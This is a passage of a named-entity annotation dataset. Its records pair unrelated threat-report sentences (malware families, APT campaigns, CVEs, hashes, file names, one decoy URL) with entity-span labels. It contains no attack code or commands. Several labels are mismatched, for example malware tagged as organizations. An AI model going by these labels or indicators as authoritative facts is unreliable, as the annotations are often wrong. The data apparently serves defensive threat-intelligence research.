For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": [{"start": 77, "end": 89, "label": "System"}, {"start": 92, "end": 108, "label": "System"}, {"start": 115, "end": 126, "label": "System"}, {"start": 157, "end": 163, "label": "Malware"}, {"start": 182, "end": 246, "label": "Indicator"}, {"start": 308, "end": 331, "label": "Indicator"}, {"start": 356, "end": 378, "label": "Malware"}]} {"text": "FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany , Japan , and the U.S until Oct. 24 at 15:00 UTC , when the infection attempts ceased and attacker infrastructure \u2013 both 1dnscontrol.com and the legitimate websites containing the rogue code \u2013 were taken offline . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 186, "end": 194, "label": "Organization"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 372, "end": 378, "label": "System"}, {"start": 384, "end": 409, "label": "Indicator"}]} {"text": "Incident Background Beginning on Oct. 24 at 08:00 UTC , FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update install_flash_player.exe that delivered a wormable variant of ransomware . 
The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": [{"start": 56, "end": 63, "label": "Organization"}, {"start": 177, "end": 201, "label": "Malware"}, {"start": 239, "end": 249, "label": "Malware"}, {"start": 256, "end": 265, "label": "Indicator"}]} {"text": "FireEye observed that BACKSWING , a malicious JavaScript profiling framework , was deployed to at least 54 legitimate sites starting as early as September 2016 . These emails included recruitment-themed lures and links to malicious HTML Application ( HTA ) files .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 57, "end": 76, "label": "System"}, {"start": 168, "end": 174, "label": "System"}, {"start": 232, "end": 248, "label": "System"}, {"start": 251, "end": 254, "label": "System"}]} {"text": "Figure 3: BACKSWING Version 2Version 1:FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 37, "end": 46, "label": "Organization"}, {"start": 77, "end": 86, "label": "Malware"}, {"start": 142, "end": 166, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 219, "end": 227, "label": "Malware"}, {"start": 260, "end": 268, "label": "Indicator"}, {"start": 284, "end": 297, "label": "Vulnerability"}]} {"text": "Beginning in May 2017 , FireEye observed a number of Ukrainian websites compromised with BACKSWING v1 , and in June 2017 , began to see content returned from BACKSWING receivers . 
ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": [{"start": 24, "end": 31, "label": "Organization"}, {"start": 89, "end": 101, "label": "Organization"}, {"start": 158, "end": 167, "label": "Organization"}, {"start": 180, "end": 189, "label": "Indicator"}, {"start": 226, "end": 243, "label": "Organization"}]} {"text": "FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 104, "end": 115, "label": "Indicator"}]} {"text": "While FireEye has not directly observed BACKSWING delivering BADRABBIT , BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol.com , which hosted the BADRABBIT dropper . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": [{"start": 6, "end": 13, "label": "Organization"}, {"start": 40, "end": 49, "label": "Organization"}, {"start": 61, "end": 70, "label": "Malware"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 142, "end": 149, "label": "Organization"}, {"start": 198, "end": 215, "label": "Malware"}, {"start": 288, "end": 292, "label": "Malware"}, {"start": 516, "end": 531, "label": "Indicator"}]} {"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . 
The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": [{"start": 46, "end": 54, "label": "Malware"}, {"start": 149, "end": 158, "label": "Indicator"}, {"start": 186, "end": 205, "label": "Indicator"}]} {"text": "Like EternalPetya , infpub.dat determines if a specific file exists on the system and will exit if found . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": [{"start": 20, "end": 30, "label": "Malware"}, {"start": 47, "end": 60, "label": "Malware"}, {"start": 111, "end": 137, "label": "Organization"}, {"start": 185, "end": 200, "label": "Indicator"}, {"start": 266, "end": 276, "label": "Organization"}, {"start": 301, "end": 313, "label": "Organization"}]} {"text": "This entry was posted on Mon Dec 04 12:00 EST 2017 and filed under Code , Reverse Engineering , Nick Harbour , and Incident Response . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": [{"start": 5, "end": 10, "label": "Malware"}, {"start": 74, "end": 93, "label": "System"}, {"start": 96, "end": 108, "label": "System"}, {"start": 164, "end": 181, "label": "Malware"}, {"start": 201, "end": 219, "label": "Malware"}, {"start": 228, "end": 240, "label": "Malware"}, {"start": 341, "end": 348, "label": "System"}, {"start": 373, "end": 384, "label": "Indicator"}]} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . 
Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 121, "end": 172, "label": "Organization"}, {"start": 175, "end": 179, "label": "Organization"}, {"start": 215, "end": 233, "label": "Indicator"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 264, "end": 281, "label": "Indicator"}, {"start": 288, "end": 298, "label": "Malware"}, {"start": 425, "end": 432, "label": "Vulnerability"}]} {"text": "The developer consistently used Accept-Enconding\u201d (note the extra \u2018n\u2019) in all DanBot samples analyzed by CTU researchers . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": [{"start": 78, "end": 84, "label": "Malware"}, {"start": 105, "end": 108, "label": "Organization"}, {"start": 183, "end": 197, "label": "System"}, {"start": 268, "end": 278, "label": "System"}, {"start": 281, "end": 283, "label": "System"}]} {"text": "Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . 
In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": [{"start": 0, "end": 17, "label": "Malware"}, {"start": 36, "end": 45, "label": "Organization"}, {"start": 58, "end": 65, "label": "Organization"}, {"start": 90, "end": 101, "label": "Organization"}, {"start": 135, "end": 154, "label": "Malware"}]} {"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": [{"start": 4, "end": 20, "label": "Malware"}, {"start": 50, "end": 63, "label": "Malware"}, {"start": 107, "end": 118, "label": "Organization"}, {"start": 152, "end": 171, "label": "Malware"}]} {"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": [{"start": 15, "end": 22, "label": "Malware"}, {"start": 36, "end": 49, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 125, "end": 132, "label": "Malware"}, {"start": 155, "end": 168, "label": "Indicator"}, {"start": 218, "end": 222, "label": "System"}, {"start": 252, "end": 265, "label": "Vulnerability"}, {"start": 266, "end": 273, "label": "Vulnerability"}]} {"text": "They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . 
Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 10, "end": 18, "label": "Malware"}, {"start": 24, "end": 32, "label": "Malware"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 69, "end": 75, "label": "Malware"}, {"start": 213, "end": 219, "label": "Organization"}, {"start": 227, "end": 255, "label": "Indicator"}]} {"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 106, "end": 120, "label": "Malware"}, {"start": 121, "end": 130, "label": "Malware"}, {"start": 188, "end": 196, "label": "Organization"}, {"start": 304, "end": 313, "label": "Indicator"}, {"start": 329, "end": 342, "label": "Vulnerability"}]} {"text": "Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . 
The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 150, "end": 165, "label": "Malware"}, {"start": 168, "end": 180, "label": "Indicator"}, {"start": 200, "end": 209, "label": "Organization"}]} {"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 18, "end": 37, "label": "Malware"}, {"start": 295, "end": 325, "label": "Indicator"}, {"start": 363, "end": 369, "label": "Organization"}]} {"text": "The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 72, "end": 89, "label": "Malware"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 202, "end": 224, "label": "Indicator"}, {"start": 248, "end": 262, "label": "System"}, {"start": 284, "end": 296, "label": "Malware"}]} {"text": "Group-IB has also detected recon emails sent out to New Zealand . 
We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 27, "end": 39, "label": "Malware"}, {"start": 103, "end": 115, "label": "Malware"}, {"start": 175, "end": 190, "label": "Indicator"}]} {"text": "In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 84, "end": 89, "label": "Malware"}, {"start": 175, "end": 196, "label": "Indicator"}]} {"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 153, "end": 162, "label": "Malware"}, {"start": 182, "end": 211, "label": "Indicator"}, {"start": 225, "end": 252, "label": "Malware"}]} {"text": "Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled \u0414\u043e\u0433\u043e\u0432\u043e\u0440.doc\u201d [Contract.doc] . 
During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface \u2013 test.xls .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 70, "end": 105, "label": "Malware"}, {"start": 208, "end": 210, "label": "System"}, {"start": 282, "end": 302, "label": "Indicator"}, {"start": 307, "end": 334, "label": "Indicator"}]} {"text": "On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": [{"start": 19, "end": 35, "label": "Malware"}, {"start": 183, "end": 189, "label": "Organization"}, {"start": 323, "end": 336, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}, {"start": 375, "end": 385, "label": "Indicator"}, {"start": 388, "end": 452, "label": "Indicator"}]} {"text": "To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . 
The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 58, "end": 68, "label": "System"}, {"start": 93, "end": 100, "label": "Organization"}, {"start": 166, "end": 178, "label": "Malware"}, {"start": 233, "end": 237, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 268, "end": 274, "label": "System"}, {"start": 300, "end": 309, "label": "Indicator"}, {"start": 313, "end": 352, "label": "Organization"}]} {"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": [{"start": 17, "end": 35, "label": "Malware"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 137, "end": 151, "label": "Organization"}, {"start": 173, "end": 179, "label": "System"}, {"start": 191, "end": 212, "label": "Indicator"}, {"start": 236, "end": 241, "label": "Organization"}]} {"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . 
Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": [{"start": 0, "end": 18, "label": "Malware"}, {"start": 59, "end": 67, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 128, "end": 145, "label": "Malware"}, {"start": 182, "end": 197, "label": "Malware"}, {"start": 351, "end": 368, "label": "Organization"}, {"start": 423, "end": 437, "label": "Indicator"}]} {"text": "Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 52, "end": 64, "label": "Malware"}, {"start": 101, "end": 107, "label": "Organization"}, {"start": 160, "end": 177, "label": "Malware"}, {"start": 237, "end": 249, "label": "Indicator"}, {"start": 253, "end": 272, "label": "Indicator"}]} {"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations . 
Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": [{"start": 6, "end": 13, "label": "Malware"}, {"start": 90, "end": 100, "label": "Organization"}, {"start": 105, "end": 112, "label": "Organization"}, {"start": 113, "end": 126, "label": "Organization"}, {"start": 129, "end": 137, "label": "Organization"}, {"start": 160, "end": 176, "label": "Indicator"}, {"start": 189, "end": 204, "label": "Indicator"}, {"start": 207, "end": 224, "label": "Indicator"}, {"start": 231, "end": 246, "label": "Indicator"}]} {"text": "The samples we analyzed originated from the Philippines . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 138, "end": 145, "label": "Indicator"}]} {"text": "Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file\u2019s compilation date . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network .", "spans": [{"start": 46, "end": 52, "label": "Malware"}, {"start": 152, "end": 165, "label": "Organization"}, {"start": 210, "end": 235, "label": "Indicator"}, {"start": 241, "end": 264, "label": "Organization"}]} {"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . 
Symantec detects this threat as Backdoor.Nidiran .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 90, "end": 115, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 133, "end": 152, "label": "Malware"}, {"start": 155, "end": 172, "label": "Malware"}, {"start": 175, "end": 198, "label": "Malware"}, {"start": 210, "end": 218, "label": "Organization"}, {"start": 242, "end": 258, "label": "Indicator"}]} {"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 18, "end": 47, "label": "Malware"}, {"start": 50, "end": 59, "label": "Malware"}, {"start": 64, "end": 75, "label": "Malware"}, {"start": 91, "end": 100, "label": "Malware"}, {"start": 167, "end": 182, "label": "Indicator"}, {"start": 214, "end": 231, "label": "Malware"}, {"start": 245, "end": 263, "label": "Malware"}]} {"text": "Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 89, "end": 99, "label": "Malware"}, {"start": 104, "end": 113, "label": "Malware"}, {"start": 121, "end": 128, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Malware"}, {"start": 180, "end": 206, "label": "Malware"}, {"start": 241, "end": 245, "label": "Indicator"}]} {"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . 
While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 43, "end": 48, "label": "Malware"}, {"start": 253, "end": 269, "label": "Indicator"}]} {"text": "FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 83, "end": 91, "label": "Malware"}, {"start": 94, "end": 104, "label": "Malware"}, {"start": 111, "end": 120, "label": "Malware"}, {"start": 232, "end": 248, "label": "Indicator"}]} {"text": "Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . 
This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 230, "end": 250, "label": "Malware"}, {"start": 403, "end": 409, "label": "System"}, {"start": 417, "end": 442, "label": "Indicator"}, {"start": 475, "end": 488, "label": "Vulnerability"}, {"start": 503, "end": 515, "label": "Malware"}, {"start": 547, "end": 573, "label": "Malware"}, {"start": 576, "end": 579, "label": "Malware"}]} {"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 EternalBlue patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 187, "end": 195, "label": "Malware"}, {"start": 196, "end": 208, "label": "Malware"}, {"start": 293, "end": 299, "label": "Malware"}, {"start": 320, "end": 330, "label": "Malware"}, {"start": 403, "end": 409, "label": "System"}, {"start": 417, "end": 442, "label": "Indicator"}, {"start": 475, "end": 488, "label": "Vulnerability"}, {"start": 503, "end": 515, "label": "Malware"}, {"start": 547, "end": 573, "label": "Malware"}, {"start": 576, "end": 579, "label": "Malware"}]} {"text": "Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw 
associated with China Chopper . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": [{"start": 68, "end": 81, "label": "Malware"}, {"start": 153, "end": 166, "label": "Malware"}, {"start": 255, "end": 268, "label": "Indicator"}, {"start": 278, "end": 285, "label": "Vulnerability"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 298, "end": 313, "label": "System"}, {"start": 314, "end": 327, "label": "Vulnerability"}, {"start": 330, "end": 343, "label": "Vulnerability"}]} {"text": "We will provide an analysis of the HyperBro tool in an upcoming section . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": [{"start": 0, "end": 2, "label": "Organization"}, {"start": 35, "end": 43, "label": "Malware"}, {"start": 171, "end": 174, "label": "Organization"}, {"start": 196, "end": 203, "label": "Indicator"}]} {"text": "Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign . 
In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": [{"start": 45, "end": 57, "label": "Malware"}, {"start": 70, "end": 89, "label": "Malware"}, {"start": 206, "end": 215, "label": "System"}, {"start": 235, "end": 249, "label": "Organization"}, {"start": 286, "end": 289, "label": "Organization"}, {"start": 326, "end": 331, "label": "Indicator"}]} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network .", "spans": [{"start": 63, "end": 76, "label": "System"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 296, "end": 317, "label": "Malware"}]} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 173, "end": 182, "label": "Indicator"}, {"start": 195, "end": 201, "label": "Malware"}]} {"text": "The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . 
The malicious loader will use dynamic-link library ( DLL ) hijacking \u2014 injecting malicious code into a process of a file/application \u2014 on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 149, "end": 159, "label": "Malware"}, {"start": 232, "end": 252, "label": "System"}, {"start": 255, "end": 258, "label": "System"}, {"start": 340, "end": 351, "label": "Indicator"}, {"start": 363, "end": 374, "label": "Indicator"}]} {"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": [{"start": 8, "end": 15, "label": "Malware"}, {"start": 27, "end": 34, "label": "Malware"}, {"start": 191, "end": 202, "label": "Indicator"}]} {"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 53, "end": 61, "label": "Malware"}, {"start": 173, "end": 176, "label": "Malware"}, {"start": 198, "end": 207, "label": "Indicator"}, {"start": 291, "end": 304, "label": "Vulnerability"}, {"start": 360, "end": 374, "label": "System"}, {"start": 375, "end": 390, "label": "Vulnerability"}]} {"text": "The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . 
Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": [{"start": 37, "end": 48, "label": "Malware"}, {"start": 116, "end": 134, "label": "Malware"}, {"start": 137, "end": 148, "label": "Malware"}, {"start": 155, "end": 160, "label": "Malware"}, {"start": 219, "end": 233, "label": "Indicator"}, {"start": 292, "end": 294, "label": "Indicator"}]} {"text": "In a case in June 2019 , we also noticed Warzone RAT being used . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": [{"start": 41, "end": 52, "label": "Malware"}, {"start": 79, "end": 85, "label": "Organization"}, {"start": 88, "end": 92, "label": "Organization"}, {"start": 148, "end": 151, "label": "Malware"}, {"start": 156, "end": 159, "label": "Malware"}, {"start": 236, "end": 244, "label": "Indicator"}]} {"text": "Xpert RAT reportedly first appeared in 2011 . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using http://voguextra.com/decoy.doc .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 46, "end": 56, "label": "Organization"}, {"start": 125, "end": 140, "label": "Indicator"}, {"start": 156, "end": 166, "label": "System"}, {"start": 178, "end": 208, "label": "Indicator"}]} {"text": "The first version of Proyecto RAT\u201d was published at the end of 2010 . 
We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": [{"start": 21, "end": 34, "label": "Malware"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 166, "end": 185, "label": "Indicator"}, {"start": 221, "end": 223, "label": "System"}]} {"text": "Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": [{"start": 36, "end": 39, "label": "Malware"}, {"start": 100, "end": 114, "label": "System"}, {"start": 150, "end": 159, "label": "Organization"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 256, "end": 273, "label": "Indicator"}]} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 121, "end": 145, "label": "System"}, {"start": 148, "end": 158, "label": "Indicator"}, {"start": 288, "end": 305, "label": "Indicator"}]} {"text": "On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . 
Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": [{"start": 66, "end": 76, "label": "Malware"}, {"start": 138, "end": 144, "label": "System"}, {"start": 194, "end": 208, "label": "Malware"}, {"start": 228, "end": 243, "label": "Indicator"}]} {"text": "Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": [{"start": 20, "end": 31, "label": "Malware"}, {"start": 96, "end": 101, "label": "Organization"}, {"start": 175, "end": 194, "label": "Malware"}, {"start": 245, "end": 248, "label": "System"}, {"start": 256, "end": 266, "label": "Indicator"}, {"start": 284, "end": 294, "label": "Indicator"}]} {"text": "In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": [{"start": 75, "end": 88, "label": "Vulnerability"}, {"start": 141, "end": 162, "label": "Organization"}, {"start": 171, "end": 186, "label": "Organization"}, {"start": 208, "end": 214, "label": "Malware"}, {"start": 218, "end": 226, "label": "Malware"}, {"start": 284, "end": 290, "label": "Malware"}, {"start": 322, "end": 326, "label": "Indicator"}]} {"text": "Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit 